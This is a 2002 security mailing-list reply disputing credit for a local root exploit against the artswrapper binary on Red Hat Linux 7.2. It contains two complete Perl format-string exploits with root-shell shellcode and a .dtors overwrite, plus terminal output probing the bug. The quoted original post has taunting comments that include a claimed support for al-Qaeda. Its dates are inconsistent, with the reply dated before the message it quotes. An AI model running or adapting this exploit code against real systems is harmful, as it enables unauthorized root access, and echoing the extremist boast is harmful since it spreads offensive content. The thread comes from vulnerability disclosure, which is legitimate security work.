[VulnWatch] Re: LOCAL ROOT EXPLOIT - SUPPORT FULL-DISCLOSURE - LOCAL ROOT EXPLOIT

From: KF (dotslash@snosoft.com)
Date: 06/13/02


From: "KF" <dotslash@snosoft.com>
To: "kanix THE HACKER" <kanix@twinkie.com>
Date: Wed, 12 Jun 2002 22:24:39 -0700

Heh looks like I fell asleep on releasing this one... and it looks like the
posted code was actually code from our labs (credit where its due
please)...just so you are aware the issue is really in artsd which is NOT
suid ... you should get a shell with your own privs... Heres where that code
really came from....

[root@ghetto dotslash]# artswrapper -a %x
>> running as realtime process now (priority 50)
Error while initializing the sound driver:
unable to select 'bffffa40' style audio I/O
[root@ghetto dotslash]# ls -al `which artswrapper`
-rwsr-sr-x 1 root root 4136 Sep 8 2001 /usr/bin/artswrapper
[root@ghetto dotslash]# ls -al `which artsd`
-rwxr-xr-x 1 root root 115284 Sep 8 2001 /usr/bin/artsd
[root@ghetto dotslash]# artsd -a %x
Error while initializing the sound driver:
unable to select 'bffffa80' style audio I/O

[dotslash@ghetto dotslash]$ cat /etc/hackme/done/artswrapex.pl
#!/usr/bin/perl

## ---/ artswrapex.pl /------------------------------------------------
##
## /usr/bin/artswrapper local format string exploit
## * tested on Red Hat Linux release 7.2 (Enigma)
## * Jun 17 2002
##
## Author: stringz // thc@drug.org
##
## Developed on the Snosoft Cerebrum test bed. - http://www.snosoft.com
##
## Greets: g463, syphix, S (super), KF, vacuum, dageshi, sozni,
## obscure, jove, rachel, kevin, and all of my 2e2h friends.
##
## ---/ powered by pot /-----------------------------------------------

# setuid + execve shellcode
$kode =
  "\x31\xdb". # xor ebx, ebx
  "\xf7\xe3". # mul ebx
  "\xb0\x17". # mov al, 0x17
  "\xcd\x80". # int 0x80
  "\x31\xc0". # xor eax, eax
  "\x99". # cdq
  "\x52". # push edx
  "\x68\x2f\x2f\x73\x68". # push dword 0x68732f2f
  "\x68\x2f\x62\x69\x6e". # push dword 0x6e69622f
  "\x89\xe3". # mov ebx, esp
  "\x52". # push edx
  "\x53". # push ebx
  "\x89\xe1". # mov ecx, esp
  "\xb0\x0b". # mov al, 0x0b
  "\xcd\x80"; # int 0x80

$vuln = "/usr/bin/artswrapper";
$dtors = 0x8049a7c + 4;;

printf("\n-- /usr/bin/artswrapper local format string exploit\n");
printf("-- stringz // thc\@drug.org\n\n");

$ret_addr = 0xc0000000 - 4
    - (length($vuln) + 1)
    - (length($kode) + 1)
    ;

undef(%ENV); $ENV{'1337'} = $kode;

printf("overwriting %#.08x with %#.08x\n", $dtors, $ret_addr);
printf("bruteforcing distance (1 .. 300)\n");
sleep(2);

for (1 .. 300) {
    $fmt_str = sw_fmtstr_create($dtors, $ret_addr, $_);
    die("\x0a") if (system("$vuln -a $fmt_str"))
        =~ m/^(0|256|512|32512)$/; # may need a tweak ;)
}

sub
sw_fmtstr_create ($$$)
{
    die("Incorrect number of arguments for sw_fmtstr_create")
        unless @_ == 3;

    my ($dest_addr, $ret_addr, $dist) = @_;
    my ($word, $qword) = (2, 8);

    # $dest_addr = where to write $ret_addr
    # $ret_addr = where to return execution
    # $dist = the calculated distance

    $tmp1 = (($ret_addr >> 16) & 0xffff);
    $tmp2 = $ret_addr & 0xffff;

    if ($tmp1 < $tmp2) {
        $high = $tmp1 - $qword;
        $low = $tmp2 - $high - $qword;

        $dest_addr1 = pack('L', $dest_addr + $word);
        $dest_addr2 = pack('L', $dest_addr);
    }
    else {
        $high = $tmp2 - $qword;
        $low = $tmp1 - $high - $qword;

        $dest_addr1 = pack('L', $dest_addr);
        $dest_addr2 = pack('L', $dest_addr + $word);
    }

    sprintf("%.4s%.4s%%%uu%%%u\$hn%%%uu%%%u\$hn",
            $dest_addr1, $dest_addr2, $high, $dist,
            $low, $dist + 1);
}

-KF

----- Original Message -----
From: "kanix THE HACKER" <kanix@twinkie.com>
To: <bugtraq@securityfocus.com>; <vulnwatch@vulnwatch.org>;
<vuln-dev@securityfocus.com>; <submissions@packetstormsecurity.org>
Sent: Saturday, July 06, 2002 3:45 PM
Subject: LOCAL ROOT EXPLOIT - SUPPORT FULL-DISCLOSURE - LOCAL ROOT EXPLOIT

> Greetings,
>
> This is a local exploit for a format string vulnerability in
/usr/bin/artswrapper on Red Hat Linux release 7.2 (Enigma).
>
> Sincerely,
>
> kanix
>

----------------------------------------------------------------------------

----

> #!/usr/bin/perl > > ######################################################################## > # > # fartsy.pl by kanix <kanix@0xfee1dead.net> > # /usr/sbin/artswrapper <local format string exploit> > # Tested on Red Hat Linux release 7.2 (Enigma) > # > # Jul 6, 2002 > # > # "the secret to creativity is knowing how to hide your sources." > # - Albert Einstein > # > # commentz, job offerz, flamez, etc. should be directed to my e-mail > # address -- I WILL SCHOOL YOU ALL. > # > # SCREW THE USA! FEAR THE POWER OF .NO !@#$%! > # official supporter of the al-Qaeda Terrorist Network. > # > # BURN, BABY, BURN!!! > # > # I 0xc0ded this for fun and profit... and to get scene whorez. ;> > # > # This code is far from special - my mother could have written it, > # however, that is the extent of my ability. > # > # I can code sploits, but I know nothing of UNC file sharing! I'm > # still very 0x1337. I mean, I can code exploits, that's what makes > # you a hacker! > # > # SPECIAL NOTE TO SCRIPT KIDDIEZ: go get a playstation or something, > # there are enuff retardz in the hacker scene already (LIKE ME ;>)! > # > # Greetz: #!digit-labs, #0xfee1dead, #rootless, #!GOBBLES, synnergy, > # security.is, #hackphreak, teleh0r (fame seeking whore like > # me!), worldsex.com, badpack3t (no 0day for j00!), TEAM TESO > # AND ALL OTHER FANZ OF THE DMCA (COPYRIGHT THIS, BITCH!@#$%!) > # > # kanix: I know how the stack werkz... I AM A HACKER. OK??!?!!! > # > # kanix: can some1 pleeze tell me about DNS cache poisoning? > # > ######################################################################## > > $kode = > "\x31\xdb". # xor ebx, ebx > "\xf7\xe3". # mul ebx > "\xb0\x17". # mov al, 0x17 > "\xcd\x80". # int 0x80 > "\x31\xc0". # xor eax, eax > "\x99". # cdq > "\x52". # push edx > "\x68\x2f\x2f\x73\x68". # push dword 0x68732f2f > "\x68\x2f\x62\x69\x6e". # push dword 0x6e69622f > "\x89\xe3". # mov ebx, esp > "\x52". # push edx > "\x53". # push ebx > "\x89\xe1". # mov ecx, esp > "\xb0\x0b". # mov al, 0x0b > "\xcd\x80"; # int 0x80 > > $vuln = "/usr/bin/artswrapper"; > $dtors = 0x8049a7c + 4;; # I overwrite .dtors! (patent pending) > > printf("\n-- /usr/bin/artswrapper local format string exploit\n"); > printf("\t by kanix <kanix\@0xfee1dead.net>\n\n"); > > $ret_addr = 0xc0000000 - 4 > - (length($vuln) + 1) > - (length($kode) + 1) > ; > > undef(%ENV); $ENV{'1337'} = $kode; > > printf("overwriting %#.08x with %#.08x\n", $dtors, $ret_addr); > printf("bruteforcing distance (1 .. 300)\n"); > sleep(2); > > for (1 .. 300) { > $fmt_str = sw_fmtstr_create($dtors, $ret_addr, $_); > die("\x0a") if (system("$vuln -a $fmt_str")) > =~ m/^(0|256|512|32512)$/; > } > > sub > sw_fmtstr_create ($$$) > { > die("Incorrect number of arguments for sw_fmtstr_create") > unless @_ == 3; > > my ($dest_addr, $ret_addr, $dist) = @_; > my ($word, $qword) = (2, 8); > > $tmp1 = (($ret_addr >> 16) & 0xffff); > $tmp2 = $ret_addr & 0xffff; > > if ($tmp1 < $tmp2) { > $high = $tmp1 - $qword; > $low = $tmp2 - $high - $qword; > > $dest_addr1 = pack('L', $dest_addr + $word); > $dest_addr2 = pack('L', $dest_addr); > } > else { > $high = $tmp2 - $qword; > $low = $tmp1 - $high - $qword; > > $dest_addr1 = pack('L', $dest_addr); > $dest_addr2 = pack('L', $dest_addr + $word); > } > > sprintf("%.4s%.4s%%%uu%%%u\$hn%%%uu%%%u\$hn", > $dest_addr1, $dest_addr2, $high, $dist, > $low, $dist + 1); > } >



Relevant Pages